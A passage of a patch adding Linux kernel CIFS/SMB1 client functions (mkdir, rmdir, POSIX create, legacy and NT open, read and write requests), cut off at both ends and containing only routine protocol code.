++	     struct cifs_sb_info *cifs_sb)
++{
++	DELETE_DIRECTORY_REQ *pSMB = NULL;
++	DELETE_DIRECTORY_RSP *pSMBr = NULL;
++	int rc = 0;
++	int bytes_returned;
++	int name_len;
++	int remap = cifs_remap(cifs_sb);
++
++	cifs_dbg(FYI, "In CIFSSMBRmDir\n");
++RmDirRetry:
++	rc = smb_init(SMB_COM_DELETE_DIRECTORY, 0, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len = cifsConvertToUTF16((__le16 *) pSMB->DirName, name,
++					      PATH_MAX, cifs_sb->local_nls,
++					      remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->DirName, name);
++	}
++
++	pSMB->BufferFormat = 0x04;
++	inc_rfc1001_len(pSMB, name_len + 1);
++	pSMB->ByteCount = cpu_to_le16(name_len + 1);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_rmdirs);
++	if (rc)
++		cifs_dbg(FYI, "Error in RMDir = %d\n", rc);
++
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto RmDirRetry;
++	return rc;
++}
++
++int
++CIFSSMBMkDir(const unsigned int xid, struct inode *inode, umode_t mode,
++	     struct cifs_tcon *tcon, const char *name,
++	     struct cifs_sb_info *cifs_sb)
++{
++	int rc = 0;
++	CREATE_DIRECTORY_REQ *pSMB = NULL;
++	CREATE_DIRECTORY_RSP *pSMBr = NULL;
++	int bytes_returned;
++	int name_len;
++	int remap = cifs_remap(cifs_sb);
++
++	cifs_dbg(FYI, "In CIFSSMBMkDir\n");
++MkDirRetry:
++	rc = smb_init(SMB_COM_CREATE_DIRECTORY, 0, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len = cifsConvertToUTF16((__le16 *) pSMB->DirName, name,
++					      PATH_MAX, cifs_sb->local_nls,
++					      remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->DirName, name);
++	}
++
++	pSMB->BufferFormat = 0x04;
++	inc_rfc1001_len(pSMB, name_len + 1);
++	pSMB->ByteCount = cpu_to_le16(name_len + 1);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_mkdirs);
++	if (rc)
++		cifs_dbg(FYI, "Error in Mkdir = %d\n", rc);
++
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto MkDirRetry;
++	return rc;
++}
++
++int
++CIFSPOSIXCreate(const unsigned int xid, struct cifs_tcon *tcon,
++		__u32 posix_flags, __u64 mode, __u16 *netfid,
++		FILE_UNIX_BASIC_INFO *pRetData, __u32 *pOplock,
++		const char *name, const struct nls_table *nls_codepage,
++		int remap)
++{
++	TRANSACTION2_SPI_REQ *pSMB = NULL;
++	TRANSACTION2_SPI_RSP *pSMBr = NULL;
++	int name_len;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, param_offset, offset, byte_count, count;
++	OPEN_PSX_REQ *pdata;
++	OPEN_PSX_RSP *psx_rsp;
++
++	cifs_dbg(FYI, "In POSIX Create\n");
++PsxCreat:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, name,
++				       PATH_MAX, nls_codepage, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, name);
++	}
++
++	params = 6 + name_len;
++	count = sizeof(OPEN_PSX_REQ);
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	pSMB->MaxDataCount = cpu_to_le16(1000);	/* large enough */
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_spi_req,
++				InformationLevel) - 4;
++	offset = param_offset + params;
++	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
++	pdata = (OPEN_PSX_REQ *)((char *)(pSMB) + offset + 4);
++	pdata->Level = cpu_to_le16(SMB_QUERY_FILE_UNIX_BASIC);
++	pdata->Permissions = cpu_to_le64(mode);
++	pdata->PosixOpenFlags = cpu_to_le32(posix_flags);
++	pdata->OpenFlags =  cpu_to_le32(*pOplock);
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
++	byte_count = 3 /* pad */  + params + count;
++
++	pSMB->DataCount = cpu_to_le16(count);
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_POSIX_OPEN);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Posix create returned %d\n", rc);
++		goto psx_create_err;
++	}
++
++	cifs_dbg(FYI, "copying inode info\n");
++	rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++	if (rc || get_bcc(&pSMBr->hdr) < sizeof(OPEN_PSX_RSP)) {
++		rc = -EIO;	/* bad smb */
++		goto psx_create_err;
++	}
++
++	/* copy return information to pRetData */
++	psx_rsp = (OPEN_PSX_RSP *)((char *) &pSMBr->hdr.Protocol
++			+ le16_to_cpu(pSMBr->t2.DataOffset));
++
++	*pOplock = le16_to_cpu(psx_rsp->OplockFlags);
++	if (netfid)
++		*netfid = psx_rsp->Fid;   /* cifs fid stays in le */
++	/* Let caller know file was created so we can set the mode. */
++	/* Do we care about the CreateAction in any other cases? */
++	if (cpu_to_le32(FILE_CREATE) == psx_rsp->CreateAction)
++		*pOplock |= CIFS_CREATE_ACTION;
++	/* check to make sure response data is there */
++	if (psx_rsp->ReturnedLevel != cpu_to_le16(SMB_QUERY_FILE_UNIX_BASIC)) {
++		pRetData->Type = cpu_to_le32(-1); /* unknown */
++		cifs_dbg(NOISY, "unknown type\n");
++	} else {
++		if (get_bcc(&pSMBr->hdr) < sizeof(OPEN_PSX_RSP)
++					+ sizeof(FILE_UNIX_BASIC_INFO)) {
++			cifs_dbg(VFS, "Open response data too small\n");
++			pRetData->Type = cpu_to_le32(-1);
++			goto psx_create_err;
++		}
++		memcpy((char *) pRetData,
++			(char *)psx_rsp + sizeof(OPEN_PSX_RSP),
++			sizeof(FILE_UNIX_BASIC_INFO));
++	}
++
++psx_create_err:
++	cifs_buf_release(pSMB);
++
++	if (posix_flags & SMB_O_DIRECTORY)
++		cifs_stats_inc(&tcon->stats.cifs_stats.num_posixmkdirs);
++	else
++		cifs_stats_inc(&tcon->stats.cifs_stats.num_posixopens);
++
++	if (rc == -EAGAIN)
++		goto PsxCreat;
++
++	return rc;
++}
++
++static __u16 convert_disposition(int disposition)
++{
++	__u16 ofun = 0;
++
++	switch (disposition) {
++		case FILE_SUPERSEDE:
++			ofun = SMBOPEN_OCREATE | SMBOPEN_OTRUNC;
++			break;
++		case FILE_OPEN:
++			ofun = SMBOPEN_OAPPEND;
++			break;
++		case FILE_CREATE:
++			ofun = SMBOPEN_OCREATE;
++			break;
++		case FILE_OPEN_IF:
++			ofun = SMBOPEN_OCREATE | SMBOPEN_OAPPEND;
++			break;
++		case FILE_OVERWRITE:
++			ofun = SMBOPEN_OTRUNC;
++			break;
++		case FILE_OVERWRITE_IF:
++			ofun = SMBOPEN_OCREATE | SMBOPEN_OTRUNC;
++			break;
++		default:
++			cifs_dbg(FYI, "unknown disposition %d\n", disposition);
++			ofun =  SMBOPEN_OAPPEND; /* regular open */
++	}
++	return ofun;
++}
++
++static int
++access_flags_to_smbopen_mode(const int access_flags)
++{
++	int masked_flags = access_flags & (GENERIC_READ | GENERIC_WRITE);
++
++	if (masked_flags == GENERIC_READ)
++		return SMBOPEN_READ;
++	else if (masked_flags == GENERIC_WRITE)
++		return SMBOPEN_WRITE;
++
++	/* just go for read/write */
++	return SMBOPEN_READWRITE;
++}
++
++int
++SMBLegacyOpen(const unsigned int xid, struct cifs_tcon *tcon,
++	    const char *fileName, const int openDisposition,
++	    const int access_flags, const int create_options, __u16 *netfid,
++	    int *pOplock, FILE_ALL_INFO *pfile_info,
++	    const struct nls_table *nls_codepage, int remap)
++{
++	int rc;
++	OPENX_REQ *pSMB = NULL;
++	OPENX_RSP *pSMBr = NULL;
++	int bytes_returned;
++	int name_len;
++	__u16 count;
++
++OldOpenRetry:
++	rc = smb_init(SMB_COM_OPEN_ANDX, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	pSMB->AndXCommand = 0xFF;       /* none */
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		count = 1;      /* account for one byte pad to word boundary */
++		name_len =
++		   cifsConvertToUTF16((__le16 *) (pSMB->fileName + 1),
++				      fileName, PATH_MAX, nls_codepage, remap);
++		name_len++;     /* trailing null */
++		name_len *= 2;
++	} else {
++		count = 0;      /* no pad */
++		name_len = copy_path_name(pSMB->fileName, fileName);
++	}
++	if (*pOplock & REQ_OPLOCK)
++		pSMB->OpenFlags = cpu_to_le16(REQ_OPLOCK);
++	else if (*pOplock & REQ_BATCHOPLOCK)
++		pSMB->OpenFlags = cpu_to_le16(REQ_BATCHOPLOCK);
++
++	pSMB->OpenFlags |= cpu_to_le16(REQ_MORE_INFO);
++	pSMB->Mode = cpu_to_le16(access_flags_to_smbopen_mode(access_flags));
++	pSMB->Mode |= cpu_to_le16(0x40); /* deny none */
++	/* set file as system file if special file such
++	   as fifo and server expecting SFU style and
++	   no Unix extensions */
++
++	if (create_options & CREATE_OPTION_SPECIAL)
++		pSMB->FileAttributes = cpu_to_le16(ATTR_SYSTEM);
++	else /* BB FIXME BB */
++		pSMB->FileAttributes = cpu_to_le16(0/*ATTR_NORMAL*/);
++
++	if (create_options & CREATE_OPTION_READONLY)
++		pSMB->FileAttributes |= cpu_to_le16(ATTR_READONLY);
++
++	/* BB FIXME BB */
++/*	pSMB->CreateOptions = cpu_to_le32(create_options &
++						 CREATE_OPTIONS_MASK); */
++	/* BB FIXME END BB */
++
++	pSMB->Sattr = cpu_to_le16(ATTR_HIDDEN | ATTR_SYSTEM | ATTR_DIRECTORY);
++	pSMB->OpenFunction = cpu_to_le16(convert_disposition(openDisposition));
++	count += name_len;
++	inc_rfc1001_len(pSMB, count);
++
++	pSMB->ByteCount = cpu_to_le16(count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			(struct smb_hdr *)pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_opens);
++	if (rc) {
++		cifs_dbg(FYI, "Error in Open = %d\n", rc);
++	} else {
++	/* BB verify if wct == 15 */
++
++/*		*pOplock = pSMBr->OplockLevel; */ /* BB take from action field*/
++
++		*netfid = pSMBr->Fid;   /* cifs fid stays in le */
++		/* Let caller know file was created so we can set the mode. */
++		/* Do we care about the CreateAction in any other cases? */
++	/* BB FIXME BB */
++/*		if (cpu_to_le32(FILE_CREATE) == pSMBr->CreateAction)
++			*pOplock |= CIFS_CREATE_ACTION; */
++	/* BB FIXME END */
++
++		if (pfile_info) {
++			pfile_info->CreationTime = 0; /* BB convert CreateTime*/
++			pfile_info->LastAccessTime = 0; /* BB fixme */
++			pfile_info->LastWriteTime = 0; /* BB fixme */
++			pfile_info->ChangeTime = 0;  /* BB fixme */
++			pfile_info->Attributes =
++				cpu_to_le32(le16_to_cpu(pSMBr->FileAttributes));
++			/* the file_info buf is endian converted by caller */
++			pfile_info->AllocationSize =
++				cpu_to_le64(le32_to_cpu(pSMBr->EndOfFile));
++			pfile_info->EndOfFile = pfile_info->AllocationSize;
++			pfile_info->NumberOfLinks = cpu_to_le32(1);
++			pfile_info->DeletePending = 0;
++		}
++	}
++
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto OldOpenRetry;
++	return rc;
++}
++
++int
++CIFS_open(const unsigned int xid, struct cifs_open_parms *oparms, int *oplock,
++	  FILE_ALL_INFO *buf)
++{
++	int rc;
++	OPEN_REQ *req = NULL;
++	OPEN_RSP *rsp = NULL;
++	int bytes_returned;
++	int name_len;
++	__u16 count;
++	struct cifs_sb_info *cifs_sb = oparms->cifs_sb;
++	struct cifs_tcon *tcon = oparms->tcon;
++	int remap = cifs_remap(cifs_sb);
++	const struct nls_table *nls = cifs_sb->local_nls;
++	int create_options = oparms->create_options;
++	int desired_access = oparms->desired_access;
++	int disposition = oparms->disposition;
++	const char *path = oparms->path;
++
++openRetry:
++	rc = smb_init(SMB_COM_NT_CREATE_ANDX, 24, tcon, (void **)&req,
++		      (void **)&rsp);
++	if (rc)
++		return rc;
++
++	/* no commands go after this */
++	req->AndXCommand = 0xFF;
++
++	if (req->hdr.Flags2 & SMBFLG2_UNICODE) {
++		/* account for one byte pad to word boundary */
++		count = 1;
++		name_len = cifsConvertToUTF16((__le16 *)(req->fileName + 1),
++					      path, PATH_MAX, nls, remap);
++		/* trailing null */
++		name_len++;
++		name_len *= 2;
++		req->NameLength = cpu_to_le16(name_len);
++	} else {
++		/* BB improve check for buffer overruns BB */
++		/* no pad */
++		count = 0;
++		name_len = copy_path_name(req->fileName, path);
++		req->NameLength = cpu_to_le16(name_len);
++	}
++
++	if (*oplock & REQ_OPLOCK)
++		req->OpenFlags = cpu_to_le32(REQ_OPLOCK);
++	else if (*oplock & REQ_BATCHOPLOCK)
++		req->OpenFlags = cpu_to_le32(REQ_BATCHOPLOCK);
++
++	req->DesiredAccess = cpu_to_le32(desired_access);
++	req->AllocationSize = 0;
++
++	/*
++	 * Set file as system file if special file such as fifo and server
++	 * expecting SFU style and no Unix extensions.
++	 */
++	if (create_options & CREATE_OPTION_SPECIAL)
++		req->FileAttributes = cpu_to_le32(ATTR_SYSTEM);
++	else
++		req->FileAttributes = cpu_to_le32(ATTR_NORMAL);
++
++	/*
++	 * XP does not handle ATTR_POSIX_SEMANTICS but it helps speed up case
++	 * sensitive checks for other servers such as Samba.
++	 */
++	if (tcon->ses->capabilities & CAP_UNIX)
++		req->FileAttributes |= cpu_to_le32(ATTR_POSIX_SEMANTICS);
++
++	if (create_options & CREATE_OPTION_READONLY)
++		req->FileAttributes |= cpu_to_le32(ATTR_READONLY);
++
++	req->ShareAccess = cpu_to_le32(FILE_SHARE_ALL);
++	req->CreateDisposition = cpu_to_le32(disposition);
++	req->CreateOptions = cpu_to_le32(create_options & CREATE_OPTIONS_MASK);
++
++	/* BB Expirement with various impersonation levels and verify */
++	req->ImpersonationLevel = cpu_to_le32(SECURITY_IMPERSONATION);
++	req->SecurityFlags = SECURITY_CONTEXT_TRACKING|SECURITY_EFFECTIVE_ONLY;
++
++	count += name_len;
++	inc_rfc1001_len(req, count);
++
++	req->ByteCount = cpu_to_le16(count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *)req,
++			 (struct smb_hdr *)rsp, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_opens);
++	if (rc) {
++		cifs_dbg(FYI, "Error in Open = %d\n", rc);
++		cifs_buf_release(req);
++		if (rc == -EAGAIN)
++			goto openRetry;
++		return rc;
++	}
++
++	/* 1 byte no need to le_to_cpu */
++	*oplock = rsp->OplockLevel;
++	/* cifs fid stays in le */
++	oparms->fid->netfid = rsp->Fid;
++	oparms->fid->access = desired_access;
++
++	/* Let caller know file was created so we can set the mode. */
++	/* Do we care about the CreateAction in any other cases? */
++	if (cpu_to_le32(FILE_CREATE) == rsp->CreateAction)
++		*oplock |= CIFS_CREATE_ACTION;
++
++	if (buf) {
++		/* copy from CreationTime to Attributes */
++		memcpy((char *)buf, (char *)&rsp->CreationTime, 36);
++		/* the file_info buf is endian converted by caller */
++		buf->AllocationSize = rsp->AllocationSize;
++		buf->EndOfFile = rsp->EndOfFile;
++		buf->NumberOfLinks = cpu_to_le32(1);
++		buf->DeletePending = 0;
++	}
++
++	cifs_buf_release(req);
++	return rc;
++}
++
++static void
++cifs_readv_callback(struct mid_q_entry *mid)
++{
++	struct cifs_readdata *rdata = mid->callback_data;
++	struct cifs_tcon *tcon = tlink_tcon(rdata->cfile->tlink);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	struct smb_rqst rqst = { .rq_iov = rdata->iov,
++				 .rq_nvec = 2,
++				 .rq_pages = rdata->pages,
++				 .rq_offset = rdata->page_offset,
++				 .rq_npages = rdata->nr_pages,
++				 .rq_pagesz = rdata->pagesz,
++				 .rq_tailsz = rdata->tailsz };
++	struct cifs_credits credits = { .value = 1, .instance = 0 };
++
++	cifs_dbg(FYI, "%s: mid=%llu state=%d result=%d bytes=%u\n",
++		 __func__, mid->mid, mid->mid_state, rdata->result,
++		 rdata->bytes);
++
++	switch (mid->mid_state) {
++	case MID_RESPONSE_RECEIVED:
++		/* result already set, check signature */
++		if (server->sign) {
++			int rc = 0;
++
++			rc = cifs_verify_signature(&rqst, server,
++						  mid->sequence_number);
++			if (rc)
++				cifs_dbg(VFS, "SMB signature verification returned error = %d\n",
++					 rc);
++		}
++		/* FIXME: should this be counted toward the initiating task? */
++		task_io_account_read(rdata->got_bytes);
++		cifs_stats_bytes_read(tcon, rdata->got_bytes);
++		break;
++	case MID_REQUEST_SUBMITTED:
++	case MID_RETRY_NEEDED:
++		rdata->result = -EAGAIN;
++		if (server->sign && rdata->got_bytes)
++			/* reset bytes number since we can not check a sign */
++			rdata->got_bytes = 0;
++		/* FIXME: should this be counted toward the initiating task? */
++		task_io_account_read(rdata->got_bytes);
++		cifs_stats_bytes_read(tcon, rdata->got_bytes);
++		break;
++	default:
++		rdata->result = -EIO;
++	}
++
++	queue_work(cifsiod_wq, &rdata->work);
++	release_mid(mid);
++	add_credits(server, &credits, 0);
++}
++
++/* cifs_async_readv - send an async write, and set up mid to handle result */
++int
++cifs_async_readv(struct cifs_readdata *rdata)
++{
++	int rc;
++	READ_REQ *smb = NULL;
++	int wct;
++	struct cifs_tcon *tcon = tlink_tcon(rdata->cfile->tlink);
++	struct smb_rqst rqst = { .rq_iov = rdata->iov,
++				 .rq_nvec = 2 };
++
++	cifs_dbg(FYI, "%s: offset=%llu bytes=%u\n",
++		 __func__, rdata->offset, rdata->bytes);
++
++	if (tcon->ses->capabilities & CAP_LARGE_FILES)
++		wct = 12;
++	else {
++		wct = 10; /* old style read */
++		if ((rdata->offset >> 32) > 0)  {
++			/* can not handle this big offset for old */
++			return -EIO;
++		}
++	}
++
++	rc = small_smb_init(SMB_COM_READ_ANDX, wct, tcon, (void **)&smb);
++	if (rc)
++		return rc;
++
++	smb->hdr.Pid = cpu_to_le16((__u16)rdata->pid);
++	smb->hdr.PidHigh = cpu_to_le16((__u16)(rdata->pid >> 16));
++
++	smb->AndXCommand = 0xFF;	/* none */
++	smb->Fid = rdata->cfile->fid.netfid;
++	smb->OffsetLow = cpu_to_le32(rdata->offset & 0xFFFFFFFF);
++	if (wct == 12)
++		smb->OffsetHigh = cpu_to_le32(rdata->offset >> 32);
++	smb->Remaining = 0;
++	smb->MaxCount = cpu_to_le16(rdata->bytes & 0xFFFF);
++	smb->MaxCountHigh = cpu_to_le32(rdata->bytes >> 16);
++	if (wct == 12)
++		smb->ByteCount = 0;
++	else {
++		/* old style read */
++		struct smb_com_readx_req *smbr =
++			(struct smb_com_readx_req *)smb;
++		smbr->ByteCount = 0;
++	}
++
++	/* 4 for RFC1001 length + 1 for BCC */
++	rdata->iov[0].iov_base = smb;
++	rdata->iov[0].iov_len = 4;
++	rdata->iov[1].iov_base = (char *)smb + 4;
++	rdata->iov[1].iov_len = get_rfc1002_length(smb);
++
++	kref_get(&rdata->refcount);
++	rc = cifs_call_async(tcon->ses->server, &rqst, cifs_readv_receive,
++			     cifs_readv_callback, NULL, rdata, 0, NULL);
++
++	if (rc == 0)
++		cifs_stats_inc(&tcon->stats.cifs_stats.num_reads);
++	else
++		kref_put(&rdata->refcount, cifs_readdata_release);
++
++	cifs_small_buf_release(smb);
++	return rc;
++}
++
++int
++CIFSSMBRead(const unsigned int xid, struct cifs_io_parms *io_parms,
++	    unsigned int *nbytes, char **buf, int *pbuf_type)
++{
++	int rc = -EACCES;
++	READ_REQ *pSMB = NULL;
++	READ_RSP *pSMBr = NULL;
++	char *pReadData = NULL;
++	int wct;
++	int resp_buf_type = 0;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++	__u32 pid = io_parms->pid;
++	__u16 netfid = io_parms->netfid;
++	__u64 offset = io_parms->offset;
++	struct cifs_tcon *tcon = io_parms->tcon;
++	unsigned int count = io_parms->length;
++
++	cifs_dbg(FYI, "Reading %d bytes on fid %d\n", count, netfid);
++	if (tcon->ses->capabilities & CAP_LARGE_FILES)
++		wct = 12;
++	else {
++		wct = 10; /* old style read */
++		if ((offset >> 32) > 0)  {
++			/* can not handle this big offset for old */
++			return -EIO;
++		}
++	}
++
++	*nbytes = 0;
++	rc = small_smb_init(SMB_COM_READ_ANDX, wct, tcon, (void **) &pSMB);
++	if (rc)
++		return rc;
++
++	pSMB->hdr.Pid = cpu_to_le16((__u16)pid);
++	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid >> 16));
++
++	/* tcon and ses pointer are checked in smb_init */
++	if (tcon->ses->server == NULL)
++		return -ECONNABORTED;
++
++	pSMB->AndXCommand = 0xFF;       /* none */
++	pSMB->Fid = netfid;
++	pSMB->OffsetLow = cpu_to_le32(offset & 0xFFFFFFFF);
++	if (wct == 12)
++		pSMB->OffsetHigh = cpu_to_le32(offset >> 32);
++
++	pSMB->Remaining = 0;
++	pSMB->MaxCount = cpu_to_le16(count & 0xFFFF);
++	pSMB->MaxCountHigh = cpu_to_le32(count >> 16);
++	if (wct == 12)
++		pSMB->ByteCount = 0;  /* no need to do le conversion since 0 */
++	else {
++		/* old style read */
++		struct smb_com_readx_req *pSMBW =
++			(struct smb_com_readx_req *)pSMB;
++		pSMBW->ByteCount = 0;
++	}
++
++	iov[0].iov_base = (char *)pSMB;
++	iov[0].iov_len = be32_to_cpu(pSMB->hdr.smb_buf_length) + 4;
++	rc = SendReceive2(xid, tcon->ses, iov, 1, &resp_buf_type,
++			  CIFS_LOG_ERROR, &rsp_iov);
++	cifs_small_buf_release(pSMB);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_reads);
++	pSMBr = (READ_RSP *)rsp_iov.iov_base;
++	if (rc) {
++		cifs_dbg(VFS, "Send error in read = %d\n", rc);
++	} else {
++		int data_length = le16_to_cpu(pSMBr->DataLengthHigh);
++		data_length = data_length << 16;
++		data_length += le16_to_cpu(pSMBr->DataLength);
++		*nbytes = data_length;
++
++		/*check that DataLength would not go beyond end of SMB */
++		if ((data_length > CIFSMaxBufSize)
++				|| (data_length > count)) {
++			cifs_dbg(FYI, "bad length %d for count %d\n",
++				 data_length, count);
++			rc = -EIO;
++			*nbytes = 0;
++		} else {
++			pReadData = (char *) (&pSMBr->hdr.Protocol) +
++					le16_to_cpu(pSMBr->DataOffset);
++/*			if (rc = copy_to_user(buf, pReadData, data_length)) {
++				cifs_dbg(VFS, "Faulting on read rc = %d\n",rc);
++				rc = -EFAULT;
++			}*/ /* can not use copy_to_user when using page cache*/
++			if (*buf)
++				memcpy(*buf, pReadData, data_length);
++		}
++	}
++
++	if (*buf) {
++		free_rsp_buf(resp_buf_type, rsp_iov.iov_base);
++	} else if (resp_buf_type != CIFS_NO_BUFFER) {
++		/* return buffer to caller to free */
++		*buf = rsp_iov.iov_base;
++		if (resp_buf_type == CIFS_SMALL_BUFFER)
++			*pbuf_type = CIFS_SMALL_BUFFER;
++		else if (resp_buf_type == CIFS_LARGE_BUFFER)
++			*pbuf_type = CIFS_LARGE_BUFFER;
++	} /* else no valid buffer on return - leave as null */
++
++	/* Note: On -EAGAIN error only caller can retry on handle based calls
++		since file handle passed in no longer valid */
++	return rc;
++}
++
++
++int
++CIFSSMBWrite(const unsigned int xid, struct cifs_io_parms *io_parms,
++	     unsigned int *nbytes, const char *buf)
++{
++	int rc = -EACCES;
++	WRITE_REQ *pSMB = NULL;
++	WRITE_RSP *pSMBr = NULL;
++	int bytes_returned, wct;
++	__u32 bytes_sent;
++	__u16 byte_count;
++	__u32 pid = io_parms->pid;
++	__u16 netfid = io_parms->netfid;
++	__u64 offset = io_parms->offset;
++	struct cifs_tcon *tcon = io_parms->tcon;
++	unsigned int count = io_parms->length;
++
++	*nbytes = 0;
++
++	/* cifs_dbg(FYI, "write at %lld %d bytes\n", offset, count);*/
++	if (tcon->ses == NULL)
++		return -ECONNABORTED;
++
++	if (tcon->ses->capabilities & CAP_LARGE_FILES)
++		wct = 14;
++	else {
++		wct = 12;
++		if ((offset >> 32) > 0) {
++			/* can not handle big offset for old srv */
++			return -EIO;
++		}
++	}
++
++	rc = smb_init(SMB_COM_WRITE_ANDX, wct, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	pSMB->hdr.Pid = cpu_to_le16((__u16)pid);
++	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid >> 16));
++
++	/* tcon and ses pointer are checked in smb_init */
++	if (tcon->ses->server == NULL)
++		return -ECONNABORTED;
++
++	pSMB->AndXCommand = 0xFF;	/* none */
++	pSMB->Fid = netfid;
++	pSMB->OffsetLow = cpu_to_le32(offset & 0xFFFFFFFF);
++	if (wct == 14)
++		pSMB->OffsetHigh = cpu_to_le32(offset >> 32);
++
++	pSMB->Reserved = 0xFFFFFFFF;
++	pSMB->WriteMode = 0;
++	pSMB->Remaining = 0;
++
++	/* Can increase buffer size if buffer is big enough in some cases ie we
++	can send more if LARGE_WRITE_X capability returned by the server and if
++	our buffer is big enough or if we convert to iovecs on socket writes
++	and eliminate the copy to the CIFS buffer */
++	if (tcon->ses->capabilities & CAP_LARGE_WRITE_X) {
++		bytes_sent = min_t(const unsigned int, CIFSMaxBufSize, count);
++	} else {
++		bytes_sent = (tcon->ses->server->maxBuf - MAX_CIFS_HDR_SIZE)
++			 & ~0xFF;
++	}
++
++	if (bytes_sent > count)
++		bytes_sent = count;
++	pSMB->DataOffset =
++		cpu_to_le16(offsetof(struct smb_com_write_req, Data) - 4);
++	if (buf)
++		memcpy(pSMB->Data, buf, bytes_sent);
++	else if (count != 0) {
++		/* No buffer */
++		cifs_buf_release(pSMB);
++		return -EINVAL;
++	} /* else setting file size with write of zero bytes */
++	if (wct == 14)
++		byte_count = bytes_sent + 1; /* pad */
++	else /* wct == 12 */
++		byte_count = bytes_sent + 5; /* bigger pad, smaller smb hdr */
++
++	pSMB->DataLengthLow = cpu_to_le16(bytes_sent & 0xFFFF);
++	pSMB->DataLengthHigh = cpu_to_le16(bytes_sent >> 16);
++	inc_rfc1001_len(pSMB, byte_count);
++
++	if (wct == 14)
++		pSMB->ByteCount = cpu_to_le16(byte_count);
++	else { /* old style write has byte count 4 bytes earlier
++		  so 4 bytes pad  */
++		struct smb_com_writex_req *pSMBW =
++			(struct smb_com_writex_req *)pSMB;
++		pSMBW->ByteCount = cpu_to_le16(byte_count);
++	}
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_writes);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in write = %d\n", rc);
++	} else {
++		*nbytes = le16_to_cpu(pSMBr->CountHigh);
++		*nbytes = (*nbytes) << 16;
++		*nbytes += le16_to_cpu(pSMBr->Count);
++
++		/*
++		 * Mask off high 16 bits when bytes written as returned by the
++		 * server is greater than bytes requested by the client. Some
++		 * OS/2 servers are known to set incorrect CountHigh values.
++		 */
++		if (*nbytes > count)
++			*nbytes &= 0xFFFF;
++	}
++
++	cifs_buf_release(pSMB);
++
++	/* Note: On -EAGAIN error only caller can retry on handle based calls
++		since file handle passed in no longer valid */
++
++	return rc;
++}
++
++/*
++ * Check the mid_state and signature on received buffer (if any), and queue the
++ * workqueue completion task.
++ */
++static void
++cifs_writev_callback(struct mid_q_entry *mid)
++{
++	struct cifs_writedata *wdata = mid->callback_data;
++	struct cifs_tcon *tcon = tlink_tcon(wdata->cfile->tlink);
++	unsigned int written;
++	WRITE_RSP *smb = (WRITE_RSP *)mid->resp_buf;
++	struct cifs_credits credits = { .value = 1, .instance = 0 };
++
++	switch (mid->mid_state) {
++	case MID_RESPONSE_RECEIVED:
++		wdata->result = cifs_check_receive(mid, tcon->ses->server, 0);
++		if (wdata->result != 0)
++			break;
++
++		written = le16_to_cpu(smb->CountHigh);
++		written <<= 16;
++		written += le16_to_cpu(smb->Count);
++		/*
++		 * Mask off high 16 bits when bytes written as returned
++		 * by the server is greater than bytes requested by the
++		 * client. OS/2 servers are known to set incorrect
